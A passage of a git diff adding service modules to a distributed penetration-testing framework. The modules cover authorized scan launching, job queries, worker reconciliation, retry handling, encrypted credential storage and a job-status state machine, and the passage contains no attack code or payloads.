== "https" else 80) + + authorization_context, auth_error = _validate_authorization_context( + owner, + target_host=target, + scan_type=ScanType.WEBAPP.value, + authorized=authorized, + target_confirmation=target_confirmation, + scope_id=scope_id, + authorization_ref=authorization_ref, + engagement_metadata=engagement_metadata, + target_allowlist=target_allowlist, + target_config=target_config, + ) + if auth_error: + return auth_error + + options = normalize_common_launch_options( + owner, + distribution_strategy=DISTRIBUTION_MIRROR, + port_order=PORT_ORDER_SEQUENTIAL, + run_mode=run_mode, + monitor_interval=monitor_interval, + scan_min_delay=scan_min_delay, + scan_max_delay=scan_max_delay, + nr_local_workers=1, + ) + active_peers, peer_error = resolve_active_peers(owner, selected_peers) + if peer_error: + return peer_error + + max_weak_attempts, target_config, allow_stateful_probes, safety_policy = _apply_launch_safety_policy( + owner, + scan_type=ScanType.WEBAPP.value, + active_peers=active_peers, + nr_local_workers=1, + scan_min_delay=options["scan_min_delay"], + max_weak_attempts=max_weak_attempts, + target_config=target_config, + allow_stateful_probes=allow_stateful_probes, + verify_tls=verify_tls, + ) + + workers, worker_error = build_webapp_workers(owner, active_peers, target_port) + if worker_error: + return worker_error + + return announce_launch( + owner, + target=target, + start_port=target_port, + end_port=target_port, + exceptions=[], + distribution_strategy=DISTRIBUTION_MIRROR, + port_order=PORT_ORDER_SEQUENTIAL, + excluded_features=excluded_features, + run_mode=options["run_mode"], + monitor_interval=options["monitor_interval"], + scan_min_delay=options["scan_min_delay"], + scan_max_delay=options["scan_max_delay"], + task_name=task_name, + task_description=task_description, + active_peers=active_peers, + workers=workers, + redact_credentials=redact_credentials, + ics_safe_mode=ics_safe_mode, + scanner_identity=scanner_identity, + scanner_user_agent=scanner_user_agent, + created_by_name=created_by_name, + created_by_id=created_by_id, + nr_local_workers=1, + scan_type=ScanType.WEBAPP.value, + target_url=target_url, + official_username=official_username, + official_password=official_password, + regular_username=regular_username, + regular_password=regular_password, + weak_candidates=weak_candidates, + max_weak_attempts=max_weak_attempts, + app_routes=app_routes, + verify_tls=verify_tls, + target_config=target_config, + allow_stateful_probes=allow_stateful_probes, + target_confirmation=authorization_context["target_confirmation"], + scope_id=authorization_context["scope_id"], + authorization_ref=authorization_context["authorization_ref"], + engagement_metadata=authorization_context["engagement_metadata"], + target_allowlist=authorization_context["target_allowlist"], + safety_policy=safety_policy, + ) + + +def launch_test( + owner, + *, + target="", + start_port=1, + end_port=65535, + exceptions="64297", + distribution_strategy="", + port_order="", + excluded_features=None, + run_mode="", + monitor_interval=0, + scan_min_delay=0.0, + scan_max_delay=0.0, + task_name="", + task_description="", + selected_peers=None, + redact_credentials=True, + ics_safe_mode=True, + scanner_identity="", + scanner_user_agent="", + authorized=False, + created_by_name="", + created_by_id="", + nr_local_workers=0, + scan_type="network", + target_url="", + official_username="", + official_password="", + regular_username="", + regular_password="", + weak_candidates=None, + max_weak_attempts=5, + app_routes=None, + verify_tls=True, + target_config=None, + allow_stateful_probes=False, + target_confirmation="", + scope_id="", + authorization_ref="", + engagement_metadata=None, + target_allowlist=None, +): + """Compatibility shim that routes to scan-type-specific launch endpoints.""" + try: + scan_type_enum = ScanType(scan_type) + except ValueError: + return validation_error(f"Invalid scan_type: {scan_type}. Valid: {[e.value for e in ScanType]}") + + if scan_type_enum == ScanType.WEBAPP: + return owner.launch_webapp_scan( + target_url=target_url, + excluded_features=excluded_features, + run_mode=run_mode, + monitor_interval=monitor_interval, + scan_min_delay=scan_min_delay, + scan_max_delay=scan_max_delay, + task_name=task_name, + task_description=task_description, + selected_peers=selected_peers, + redact_credentials=redact_credentials, + ics_safe_mode=ics_safe_mode, + scanner_identity=scanner_identity, + scanner_user_agent=scanner_user_agent, + authorized=authorized, + created_by_name=created_by_name, + created_by_id=created_by_id, + official_username=official_username, + official_password=official_password, + regular_username=regular_username, + regular_password=regular_password, + weak_candidates=weak_candidates, + max_weak_attempts=max_weak_attempts, + app_routes=app_routes, + verify_tls=verify_tls, + target_config=target_config, + allow_stateful_probes=allow_stateful_probes, + target_confirmation=target_confirmation, + scope_id=scope_id, + authorization_ref=authorization_ref, + engagement_metadata=engagement_metadata, + target_allowlist=target_allowlist, + ) + + return owner.launch_network_scan( + target=target, + start_port=start_port, + end_port=end_port, + exceptions=exceptions, + distribution_strategy=distribution_strategy, + port_order=port_order, + excluded_features=excluded_features, + run_mode=run_mode, + monitor_interval=monitor_interval, + scan_min_delay=scan_min_delay, + scan_max_delay=scan_max_delay, + task_name=task_name, + task_description=task_description, + selected_peers=selected_peers, + redact_credentials=redact_credentials, + ics_safe_mode=ics_safe_mode, + scanner_identity=scanner_identity, + scanner_user_agent=scanner_user_agent, + authorized=authorized, + created_by_name=created_by_name, + created_by_id=created_by_id, + nr_local_workers=nr_local_workers, + target_confirmation=target_confirmation, + scope_id=scope_id, + authorization_ref=authorization_ref, + engagement_metadata=engagement_metadata, + target_allowlist=target_allowlist, + ) diff --git a/extensions/business/cybersec/red_mesh/services/query.py b/extensions/business/cybersec/red_mesh/services/query.py new file mode 100644 index 00000000..6a814095 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/query.py @@ -0,0 +1,326 @@ +from ..models import JobArchive +from ..repositories import ArtifactRepository, JobStateRepository +from .reconciliation import reconcile_job_workers +from .triage import get_job_archive_with_triage + + +def _job_repo(owner): + getter = getattr(type(owner), "_get_job_state_repository", None) + if callable(getter): + return getter(owner) + return JobStateRepository(owner) + + +def _artifact_repo(owner): + getter = getattr(type(owner), "_get_artifact_repository", None) + if callable(getter): + return getter(owner) + return ArtifactRepository(owner) + + +def _summarize_archive_passes(passes: list[dict]) -> list[dict]: + summaries = [] + for pass_data in passes or []: + if not isinstance(pass_data, dict): + continue + findings = pass_data.get("findings") or [] + summaries.append({ + "pass_nr": pass_data.get("pass_nr"), + "date_started": pass_data.get("date_started"), + "date_completed": pass_data.get("date_completed"), + "duration": pass_data.get("duration"), + "risk_score": pass_data.get("risk_score", 0), + "quick_summary": pass_data.get("quick_summary"), + "llm_failed": pass_data.get("llm_failed", False), + "aggregated_report_cid": pass_data.get("aggregated_report_cid", ""), + "worker_count": len(pass_data.get("worker_reports") or {}), + "findings_count": len(findings), + }) + return summaries + + +def _paginate_archive_passes(archive: dict, *, summary_only: bool, pass_offset: int, pass_limit: int): + all_passes = list(archive.get("passes", []) or []) + total_passes = len(all_passes) + pass_offset = max(int(pass_offset or 0), 0) + pass_limit = max(int(pass_limit or 0), 0) + selected = all_passes[pass_offset:] + if pass_limit > 0: + selected = selected[:pass_limit] + archive = dict(archive) + archive["passes"] = _summarize_archive_passes(selected) if summary_only else selected + archive["archive_query"] = { + "summary_only": bool(summary_only), + "pass_offset": pass_offset, + "pass_limit": pass_limit, + "total_passes": total_passes, + "returned_passes": len(selected), + "truncated": pass_offset > 0 or (pass_limit > 0 and pass_offset + len(selected) < total_passes), + } + return archive + + +def get_job_data(owner, job_id: str): + """ + Retrieve job data from CStore. + + Finalized/stopped jobs return the lightweight stub as-is. Running jobs keep + only the most recent pass report references to avoid large response payloads. + """ + job_specs = owner._get_job_from_cstore(job_id) + if not job_specs: + return { + "job_id": job_id, + "found": False, + "message": "Job not found in network store.", + } + + if job_specs.get("job_cid"): + return { + "job_id": job_id, + "found": True, + "job": job_specs, + } + + pass_reports = job_specs.get("pass_reports", []) + if isinstance(pass_reports, list) and len(pass_reports) > 5: + job_specs["pass_reports"] = pass_reports[-5:] + + if isinstance(job_specs.get("workers"), dict): + now = None + time_fn = getattr(owner, "time", None) + if callable(time_fn): + try: + now = float(time_fn()) + except (TypeError, ValueError): + now = None + job_specs["workers_reconciled"] = reconcile_job_workers( + owner, + job_specs, + live_payloads=_job_repo(owner).list_live_progress() or {}, + now=now, + ) + + return { + "job_id": job_id, + "found": True, + "job": job_specs, + } + + +def get_job_archive(owner, job_id: str, summary_only: bool = False, pass_offset: int = 0, pass_limit: int = 0): + """ + Retrieve the full archived job payload from R1FS for finalized jobs. + """ + result = get_job_archive_with_triage(owner, job_id) + if "archive" not in result: + return result + if summary_only or int(pass_offset or 0) > 0 or int(pass_limit or 0) > 0: + result = dict(result) + result["archive"] = _paginate_archive_passes( + result["archive"], + summary_only=summary_only, + pass_offset=pass_offset, + pass_limit=pass_limit, + ) + return result + + +def get_job_analysis(owner, job_id: str = "", cid: str = "", pass_nr: int = None): + """ + Retrieve stored LLM analysis for a job or pass report CID. + + Finalized jobs are resolved from the archived job payload so analysis remains + available after CStore pruning. Running jobs continue to resolve via live + pass report references in CStore. + """ + if cid: + try: + analysis = owner.r1fs.get_json(cid) + if analysis is None: + return {"error": "Analysis not found", "cid": cid} + return {"cid": cid, "analysis": analysis} + except Exception as e: + return {"error": str(e), "cid": cid} + + if not job_id: + return {"error": "Either job_id or cid must be provided"} + + job_specs = owner._get_job_from_cstore(job_id) + if not job_specs: + return {"error": "Job not found", "job_id": job_id} + + job_status = job_specs.get("job_status") + + if job_specs.get("job_cid"): + archive_result = get_job_archive_with_triage(owner, job_id) + if "archive" not in archive_result: + return { + "error": archive_result.get("error", "archive_unavailable"), + "message": archive_result.get("message"), + "job_id": job_id, + "job_status": job_status, + } + + archive = archive_result["archive"] + passes = archive.get("passes", []) or [] + if not passes: + return {"error": "No pass reports available for this job", "job_id": job_id, "job_status": job_status} + + if pass_nr is not None: + target_pass = next((entry for entry in passes if entry.get("pass_nr") == pass_nr), None) + if not target_pass: + return { + "error": f"Pass {pass_nr} not found in history", + "job_id": job_id, + "available_passes": [entry.get("pass_nr") for entry in passes], + "job_status": job_status, + } + else: + target_pass = passes[-1] + + llm_analysis = target_pass.get("llm_analysis") + if not llm_analysis: + return { + "error": "No LLM analysis available for this pass", + "job_id": job_id, + "pass_nr": target_pass.get("pass_nr"), + "llm_failed": target_pass.get("llm_failed", False), + "job_status": job_status, + } + + job_config = archive.get("job_config", {}) or {} + target_value = job_config.get("target") or job_specs.get("target") + return { + "job_id": job_id, + "pass_nr": target_pass.get("pass_nr"), + "completed_at": target_pass.get("date_completed"), + "report_cid": target_pass.get("report_cid"), + "target": target_value, + "num_workers": len(target_pass.get("worker_reports", {}) or {}), + "total_passes": len(passes), + "analysis": llm_analysis, + "quick_summary": target_pass.get("quick_summary"), + } + + pass_reports = job_specs.get("pass_reports", []) + if not pass_reports: + if job_status == "RUNNING": + return {"error": "Job still running, no passes completed yet", "job_id": job_id, "job_status": job_status} + return {"error": "No pass reports available for this job", "job_id": job_id, "job_status": job_status} + + if pass_nr is not None: + target_pass = next((entry for entry in pass_reports if entry.get("pass_nr") == pass_nr), None) + if not target_pass: + return { + "error": f"Pass {pass_nr} not found in history", + "job_id": job_id, + "available_passes": [entry.get("pass_nr") for entry in pass_reports], + } + else: + target_pass = pass_reports[-1] + + report_cid = target_pass.get("report_cid") + if not report_cid: + return { + "error": "No pass report CID available for this pass", + "job_id": job_id, + "pass_nr": target_pass.get("pass_nr"), + "job_status": job_status, + } + + try: + pass_data = owner.r1fs.get_json(report_cid) + if pass_data is None: + return {"error": "Pass report not found in R1FS", "cid": report_cid, "job_id": job_id} + + llm_analysis = pass_data.get("llm_analysis") + if not llm_analysis: + return { + "error": "No LLM analysis available for this pass", + "job_id": job_id, + "pass_nr": target_pass.get("pass_nr"), + "llm_failed": pass_data.get("llm_failed", False), + "job_status": job_status, + } + + return { + "job_id": job_id, + "pass_nr": target_pass.get("pass_nr"), + "completed_at": pass_data.get("date_completed"), + "report_cid": report_cid, + "target": job_specs.get("target"), + "num_workers": len(job_specs.get("workers", {})), + "total_passes": len(pass_reports), + "analysis": llm_analysis, + "quick_summary": pass_data.get("quick_summary"), + } + except Exception as e: + return {"error": str(e), "cid": report_cid, "job_id": job_id} + + +def get_job_progress(owner, job_id: str): + """ + Return real-time progress for all workers in the given job. + """ + all_progress = _job_repo(owner).list_live_progress() or {} + + job_specs = _job_repo(owner).get_job(job_id) + status = None + scan_type = None + result = {} + if isinstance(job_specs, dict): + status = job_specs.get("job_status") + scan_type = job_specs.get("scan_type") + result = reconcile_job_workers(owner, job_specs, live_payloads=all_progress) + else: + prefix = f"{job_id}:" + for key, value in all_progress.items(): + if key.startswith(prefix) and value is not None: + worker_addr = key[len(prefix):] + result[worker_addr] = value + return {"job_id": job_id, "status": status, "scan_type": scan_type, "workers": result} + + +def list_network_jobs(owner): + """ + Return a normalized network-job listing from CStore. + """ + raw_network_jobs = _job_repo(owner).list_jobs() + normalized_jobs = {} + for job_key, job_spec in raw_network_jobs.items(): + normalized_key, normalized_spec = owner._normalize_job_record(job_key, job_spec) + if normalized_key and normalized_spec: + if normalized_spec.get("job_cid"): + normalized_jobs[normalized_key] = normalized_spec + continue + + normalized_jobs[normalized_key] = { + "job_id": normalized_spec.get("job_id"), + "job_status": normalized_spec.get("job_status"), + "target": normalized_spec.get("target"), + "scan_type": normalized_spec.get("scan_type", "network"), + "target_url": normalized_spec.get("target_url", ""), + "task_name": normalized_spec.get("task_name"), + "risk_score": normalized_spec.get("risk_score", 0), + "run_mode": normalized_spec.get("run_mode"), + "start_port": normalized_spec.get("start_port"), + "end_port": normalized_spec.get("end_port"), + "date_created": normalized_spec.get("date_created"), + "launcher": normalized_spec.get("launcher"), + "launcher_alias": normalized_spec.get("launcher_alias"), + "worker_count": len(normalized_spec.get("workers", {}) or {}), + "pass_count": len(normalized_spec.get("pass_reports", []) or []), + "job_pass": normalized_spec.get("job_pass", 1), + } + return normalized_jobs + + +def list_local_jobs(owner): + """ + Return jobs currently running on the local node. + """ + return { + job_id: owner._get_job_status(job_id) + for job_id, local_workers in owner.scan_jobs.items() + } diff --git a/extensions/business/cybersec/red_mesh/services/reconciliation.py b/extensions/business/cybersec/red_mesh/services/reconciliation.py new file mode 100644 index 00000000..dc28f7d9 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/reconciliation.py @@ -0,0 +1,158 @@ +from ..models import WorkerProgress +from .config import resolve_config_block + +DEFAULT_DISTRIBUTED_JOB_RECONCILIATION_CONFIG = { + "STARTUP_TIMEOUT": 45.0, + "STALE_TIMEOUT": 120.0, + "STALE_GRACE": 30.0, + "MAX_REANNOUNCE_ATTEMPTS": 3, +} + + +def _safe_int(value, default): + try: + return int(value) + except (TypeError, ValueError): + return default + + +def _safe_float(value, default=None): + try: + return float(value) + except (TypeError, ValueError): + return default + + +def get_distributed_job_reconciliation_config(owner): + """Return normalized distributed-job reconciliation config.""" + def _normalize(merged, defaults): + startup_timeout = _safe_float( + merged.get("STARTUP_TIMEOUT"), + defaults["STARTUP_TIMEOUT"], + ) + if startup_timeout is None or startup_timeout <= 0: + startup_timeout = defaults["STARTUP_TIMEOUT"] + + stale_timeout = _safe_float( + merged.get("STALE_TIMEOUT"), + defaults["STALE_TIMEOUT"], + ) + if stale_timeout is None or stale_timeout <= 0: + stale_timeout = defaults["STALE_TIMEOUT"] + + stale_grace = _safe_float( + merged.get("STALE_GRACE"), + defaults["STALE_GRACE"], + ) + if stale_grace is None or stale_grace < 0: + stale_grace = defaults["STALE_GRACE"] + + max_reannounce_attempts = _safe_int( + merged.get("MAX_REANNOUNCE_ATTEMPTS"), + defaults["MAX_REANNOUNCE_ATTEMPTS"], + ) + if max_reannounce_attempts < 0: + max_reannounce_attempts = defaults["MAX_REANNOUNCE_ATTEMPTS"] + + return { + "STARTUP_TIMEOUT": startup_timeout, + "STALE_TIMEOUT": stale_timeout, + "STALE_GRACE": stale_grace, + "MAX_REANNOUNCE_ATTEMPTS": max_reannounce_attempts, + } + + return resolve_config_block( + owner, + "DISTRIBUTED_JOB_RECONCILIATION", + DEFAULT_DISTRIBUTED_JOB_RECONCILIATION_CONFIG, + normalizer=_normalize, + ) + + +def _matched_live_progress(job_id, worker_addr, pass_nr, assignment_revision, live_payloads): + key = f"{job_id}:{worker_addr}" + payload = (live_payloads or {}).get(key) + if not isinstance(payload, dict): + return None, None + try: + live = WorkerProgress.from_dict(payload) + except (KeyError, TypeError, ValueError): + return None, "malformed_live" + if live.job_id != job_id: + return None, "job_mismatch" + if live.pass_nr != pass_nr: + return None, "pass_mismatch" + if live.assignment_revision_seen != assignment_revision: + return None, "revision_mismatch" + return live, None + + +def reconcile_job_workers(owner, job_specs, *, live_payloads=None, now=None): + """ + Merge launcher-owned worker assignments with worker-owned :live state. + + Returned worker entries always include launcher assignment metadata and a + derived ``worker_state``. Matched ``:live`` payloads are folded into the + same per-worker dict so API consumers and launcher logic interpret state + through one canonical path. + """ + if not isinstance(job_specs, dict): + return {} + + job_id = job_specs.get("job_id") + pass_nr = _safe_int(job_specs.get("job_pass", 1), 1) + workers = job_specs.get("workers") or {} + live_payloads = live_payloads or {} + stale_timeout = get_distributed_job_reconciliation_config(owner)["STALE_TIMEOUT"] + if now is None: + time_fn = getattr(owner, "time", None) + if callable(time_fn): + now = _safe_float(time_fn(), None) + + reconciled = {} + for worker_addr, raw_worker_entry in workers.items(): + worker_entry = dict(raw_worker_entry or {}) + assignment_revision = _safe_int(worker_entry.get("assignment_revision", 1), 1) + live, ignored_reason = _matched_live_progress( + job_id, + worker_addr, + pass_nr, + assignment_revision, + live_payloads, + ) + + state = "unseen" + if worker_entry.get("terminal_reason") == "unreachable": + state = "unreachable" + elif worker_entry.get("finished"): + state = "failed" if worker_entry.get("error") else "finished" + elif live is not None: + if live.error: + state = "failed" + elif live.finished: + state = "finished" + else: + last_seen_at = _safe_float(live.last_seen_at, _safe_float(live.updated_at, None)) + if now is not None and last_seen_at is not None and now - last_seen_at > stale_timeout: + state = "stale" + elif live.started_at: + state = "started" if _safe_float(live.progress, 0.0) <= 0 else "active" + + payload = dict(worker_entry) + payload["worker_addr"] = worker_addr + payload["pass_nr"] = pass_nr + payload["assignment_revision"] = assignment_revision + payload["worker_state"] = state + + if live is not None: + payload.update(live.to_dict()) + elif ignored_reason: + payload["ignored_live_reason"] = ignored_reason + if ignored_reason == "malformed_live" and hasattr(owner, "P"): + owner.P( + f"[LIVE] Ignoring malformed live payload for job_id={job_id} worker={worker_addr}", + color='y', + ) + + reconciled[worker_addr] = payload + return reconciled diff --git a/extensions/business/cybersec/red_mesh/services/resilience.py b/extensions/business/cybersec/red_mesh/services/resilience.py new file mode 100644 index 00000000..233980bf --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/resilience.py @@ -0,0 +1,52 @@ +def _safe_log(owner, message: str, color: str = None): + logger = getattr(owner, "P", None) + if callable(logger): + if color is None: + logger(message) + else: + logger(message, color=color) + + +def _safe_audit(owner, event: str, payload: dict): + audit = getattr(owner, "_log_audit_event", None) + if callable(audit): + audit(event, payload) + + +def run_bounded_retry(owner, action: str, attempts: int, operation, is_success=None): + """Run a side-effecting operation with bounded retries and observable logs.""" + attempts = max(int(attempts or 1), 1) + last_result = None + last_error = None + success_check = is_success or (lambda value: bool(value)) + + for attempt in range(1, attempts + 1): + try: + last_result = operation() + if success_check(last_result): + if attempt > 1: + _safe_log(owner, f"[RETRY] {action} succeeded on attempt {attempt}/{attempts}") + _safe_audit(owner, "retry_recovered", { + "action": action, + "attempt": attempt, + "attempts": attempts, + }) + return last_result + _safe_log(owner, f"[RETRY] {action} attempt {attempt}/{attempts} did not meet success criteria", color='y') + except Exception as exc: + last_error = exc + last_result = None + _safe_log(owner, f"[RETRY] {action} attempt {attempt}/{attempts} failed: {exc}", color='y') + + if attempt < attempts: + _safe_audit(owner, "retry_attempt", { + "action": action, + "attempt": attempt, + "attempts": attempts, + }) + + payload = {"action": action, "attempts": attempts} + if last_error is not None: + payload["error"] = str(last_error) + _safe_audit(owner, "retry_exhausted", payload) + return last_result diff --git a/extensions/business/cybersec/red_mesh/services/scan_strategy.py b/extensions/business/cybersec/red_mesh/services/scan_strategy.py new file mode 100644 index 00000000..c1e9e690 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/scan_strategy.py @@ -0,0 +1,49 @@ +from dataclasses import dataclass + +from ..constants import ScanType +from ..graybox.worker import GrayboxLocalWorker +from ..worker import PentestLocalWorker + + +@dataclass(frozen=True) +class ScanStrategy: + scan_type: ScanType + worker_cls: type + catalog_categories: tuple[str, ...] + + +SCAN_STRATEGIES = { + ScanType.NETWORK: ScanStrategy( + scan_type=ScanType.NETWORK, + worker_cls=PentestLocalWorker, + catalog_categories=("service", "web", "correlation"), + ), + ScanType.WEBAPP: ScanStrategy( + scan_type=ScanType.WEBAPP, + worker_cls=GrayboxLocalWorker, + catalog_categories=("graybox",), + ), +} + + +def coerce_scan_type(scan_type=None): + """Normalize optional scan-type input to ScanType or None.""" + if scan_type in (None, "", "all"): + return None + if isinstance(scan_type, ScanType): + return scan_type + return ScanType(str(scan_type)) + + +def get_scan_strategy(scan_type=None, default=ScanType.NETWORK) -> ScanStrategy: + normalized = coerce_scan_type(scan_type) + if normalized is None: + normalized = default + return SCAN_STRATEGIES[normalized] + + +def iter_scan_strategies(scan_type=None): + normalized = coerce_scan_type(scan_type) + if normalized is not None: + return [(normalized, SCAN_STRATEGIES[normalized])] + return list(SCAN_STRATEGIES.items()) diff --git a/extensions/business/cybersec/red_mesh/services/secrets.py b/extensions/business/cybersec/red_mesh/services/secrets.py new file mode 100644 index 00000000..c714d216 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/secrets.py @@ -0,0 +1,202 @@ +from copy import deepcopy +import os + +from ..models import JobConfig +from ..repositories import ArtifactRepository +from .config import get_attestation_config + + +def _artifact_repo(owner): + getter = getattr(type(owner), "_get_artifact_repository", None) + if callable(getter): + return getter(owner) + return ArtifactRepository(owner) + + +class R1fsSecretStore: + """Secret-store adapter backed by a protected R1FS JSON object.""" + + def __init__(self, owner): + self.owner = owner + + @staticmethod + def _normalize_secret_key(value): + if not isinstance(value, str): + return "" + value = value.strip() + return value if len(value) >= 8 else "" + + def _get_secret_store_key(self) -> str: + candidates = [ + os.environ.get("REDMESH_SECRET_STORE_KEY", ""), + getattr(self.owner, "cfg_redmesh_secret_store_key", ""), + getattr(self.owner, "cfg_comms_host_key", ""), + get_attestation_config(self.owner)["PRIVATE_KEY"], + ] + for candidate in candidates: + key = self._normalize_secret_key(candidate) + if key: + return key + return "" + + def save_graybox_credentials(self, job_id: str, payload: dict) -> str: + secret_key = self._get_secret_store_key() + if not secret_key: + self.owner.P( + "No strong RedMesh secret-store key is configured. " + "Graybox launch credentials cannot be persisted safely.", + color='r', + ) + return "" + secret_doc = { + "kind": "redmesh_graybox_credentials", + "job_id": job_id, + "storage_mode": "encrypted_r1fs_json_v1", + "payload": payload, + } + return _artifact_repo(self.owner).put_json(secret_doc, show_logs=False, secret=secret_key) + + def load_graybox_credentials(self, secret_ref: str) -> dict | None: + if not secret_ref: + return None + repo = _artifact_repo(self.owner) + secret_key = self._get_secret_store_key() + secret_doc = None + if secret_key: + secret_doc = repo.get_json(secret_ref, secret=secret_key) + if not isinstance(secret_doc, dict): + secret_doc = repo.get_json(secret_ref) + if not isinstance(secret_doc, dict): + self.owner.P(f"Failed to fetch graybox secret payload from R1FS (CID: {secret_ref})", color='r') + return None + payload = secret_doc.get("payload") + if not isinstance(payload, dict): + self.owner.P(f"Invalid graybox secret payload for ref {secret_ref}", color='r') + return None + return payload + + def delete_secret(self, secret_ref: str) -> bool: + if not secret_ref: + return True + try: + return bool(_artifact_repo(self.owner).delete(secret_ref, show_logs=False, raise_on_error=False)) + except Exception as exc: + self.owner.P(f"Failed to delete graybox secret ref {secret_ref}: {exc}", color='y') + return False + + +def _blank_graybox_secret_fields(config_dict: dict) -> dict: + sanitized = dict(config_dict) + sanitized["official_username"] = "" + sanitized["official_password"] = "" + sanitized["regular_username"] = "" + sanitized["regular_password"] = "" + sanitized.pop("weak_candidates", None) + return sanitized + + +def _coerce_job_config_dict(config_dict: dict) -> dict: + raw = deepcopy(config_dict or {}) + raw.setdefault("target", raw.get("target_url", "")) + raw.setdefault("start_port", 0) + raw.setdefault("end_port", 0) + return JobConfig.from_dict(raw).to_dict() + + +def build_graybox_secret_payload( + *, + official_username="", + official_password="", + regular_username="", + regular_password="", + weak_candidates=None, +): + return { + "official_username": official_username or "", + "official_password": official_password or "", + "regular_username": regular_username or "", + "regular_password": regular_password or "", + "weak_candidates": list(weak_candidates) if isinstance(weak_candidates, list) else weak_candidates, + } + + +def persist_job_config_with_secrets( + owner, + *, + job_id: str, + config_dict: dict, +): + """ + Persist durable job config with secrets split into a separate secret object. + + Returns + ------- + tuple[dict, str] + Persisted config dict and resulting job_config_cid. + """ + persisted_config = _coerce_job_config_dict(config_dict) + scan_type = persisted_config.get("scan_type", "network") + if scan_type == "webapp": + payload = build_graybox_secret_payload( + official_username=persisted_config.get("official_username", ""), + official_password=persisted_config.get("official_password", ""), + regular_username=persisted_config.get("regular_username", ""), + regular_password=persisted_config.get("regular_password", ""), + weak_candidates=persisted_config.get("weak_candidates"), + ) + has_secret_payload = any([ + payload["official_username"], + payload["official_password"], + payload["regular_username"], + payload["regular_password"], + payload["weak_candidates"], + ]) + if has_secret_payload: + store = R1fsSecretStore(owner) + secret_ref = store.save_graybox_credentials(job_id, payload) + if not secret_ref: + owner.P("Failed to persist graybox secret payload in R1FS — aborting launch", color='r') + return persisted_config, "" + persisted_config["secret_ref"] = secret_ref + persisted_config["has_regular_credentials"] = bool(payload["regular_username"] or payload["regular_password"]) + persisted_config["has_weak_candidates"] = bool(payload["weak_candidates"]) + persisted_config = _blank_graybox_secret_fields(persisted_config) + + job_config_cid = _artifact_repo(owner).put_job_config(persisted_config, show_logs=False) + return persisted_config, job_config_cid + + +def resolve_job_config_secrets(owner, config_dict: dict, include_secret_metadata: bool = True) -> dict: + """ + Resolve secret_ref into runtime-only inline credentials for worker execution. + + Backward compatibility: + - configs without secret_ref are returned unchanged + - legacy inline secrets remain supported + """ + resolved = _coerce_job_config_dict(config_dict) + secret_ref = resolved.get("secret_ref") + if not secret_ref: + return resolved + + payload = R1fsSecretStore(owner).load_graybox_credentials(secret_ref) + if not payload: + return resolved + + resolved.update({ + "official_username": payload.get("official_username", ""), + "official_password": payload.get("official_password", ""), + "regular_username": payload.get("regular_username", ""), + "regular_password": payload.get("regular_password", ""), + "weak_candidates": payload.get("weak_candidates"), + }) + if not include_secret_metadata: + resolved.pop("secret_ref", None) + return resolved + + +def collect_secret_refs_from_job_config(job_config: dict) -> list[str]: + secret_ref = (job_config or {}).get("secret_ref") + if isinstance(secret_ref, str) and secret_ref: + return [secret_ref] + return [] diff --git a/extensions/business/cybersec/red_mesh/services/state_machine.py b/extensions/business/cybersec/red_mesh/services/state_machine.py new file mode 100644 index 00000000..03e10b64 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/state_machine.py @@ -0,0 +1,72 @@ +from ..constants import ( + JOB_STATUS_ANALYZING, + JOB_STATUS_COLLECTING, + JOB_STATUS_FINALIZED, + JOB_STATUS_FINALIZING, + JOB_STATUS_RUNNING, + JOB_STATUS_SCHEDULED_FOR_STOP, + JOB_STATUS_STOPPED, +) + + +JOB_STATUS_TRANSITIONS = { + JOB_STATUS_RUNNING: { + JOB_STATUS_COLLECTING, + JOB_STATUS_SCHEDULED_FOR_STOP, + JOB_STATUS_STOPPED, + }, + JOB_STATUS_SCHEDULED_FOR_STOP: { + JOB_STATUS_COLLECTING, + JOB_STATUS_STOPPED, + }, + JOB_STATUS_COLLECTING: { + JOB_STATUS_ANALYZING, + JOB_STATUS_FINALIZING, + JOB_STATUS_STOPPED, + }, + JOB_STATUS_ANALYZING: { + JOB_STATUS_FINALIZING, + JOB_STATUS_STOPPED, + }, + JOB_STATUS_FINALIZING: { + JOB_STATUS_RUNNING, + JOB_STATUS_FINALIZED, + JOB_STATUS_STOPPED, + }, + JOB_STATUS_FINALIZED: set(), + JOB_STATUS_STOPPED: set(), +} + +TERMINAL_JOB_STATUSES = { + JOB_STATUS_FINALIZED, + JOB_STATUS_STOPPED, +} + +INTERMEDIATE_JOB_STATUSES = { + JOB_STATUS_COLLECTING, + JOB_STATUS_ANALYZING, + JOB_STATUS_FINALIZING, +} + + +def can_transition_job_status(current_status: str, next_status: str) -> bool: + if current_status == next_status: + return True + allowed = JOB_STATUS_TRANSITIONS.get(current_status, set()) + return next_status in allowed + + +def set_job_status(job_specs: dict, next_status: str) -> dict: + current_status = job_specs.get("job_status", JOB_STATUS_RUNNING) + if not can_transition_job_status(current_status, next_status): + raise ValueError(f"Invalid job status transition: {current_status} -> {next_status}") + job_specs["job_status"] = next_status + return job_specs + + +def is_terminal_job_status(status: str) -> bool: + return status in TERMINAL_JOB_STATUSES + + +def is_intermediate_job_status(status: str) -> bool: + return status in INTERMEDIATE_JOB_STATUSES diff --git a/extensions/business/cybersec/red_mesh/services/triage.py b/extensions/business/cybersec/red_mesh/services/triage.py new file mode 100644 index 00000000..cec0608d --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/triage.py @@ -0,0 +1,144 @@ +from copy import deepcopy + +from ..models import FindingTriageAuditEntry, FindingTriageState, VALID_TRIAGE_STATUSES +from ..repositories import ArtifactRepository, JobStateRepository + + +def _job_repo(owner): + getter = getattr(type(owner), "_get_job_state_repository", None) + if callable(getter): + return getter(owner) + return JobStateRepository(owner) + + +def _artifact_repo(owner): + getter = getattr(type(owner), "_get_artifact_repository", None) + if callable(getter): + return getter(owner) + return ArtifactRepository(owner) + + +def _archive_contains_finding(archive: dict, finding_id: str) -> bool: + for pass_report in archive.get("passes", []) or []: + for finding in pass_report.get("findings", []) or []: + if isinstance(finding, dict) and finding.get("finding_id") == finding_id: + return True + return False + + +def _merge_triage_into_archive_dict(archive: dict, triage_map: dict) -> dict: + merged = deepcopy(archive) + for pass_report in merged.get("passes", []) or []: + for finding in pass_report.get("findings", []) or []: + if not isinstance(finding, dict): + continue + triage = triage_map.get(finding.get("finding_id")) + if triage: + finding["triage"] = triage + ui = merged.get("ui_aggregate") + if isinstance(ui, dict): + for finding in 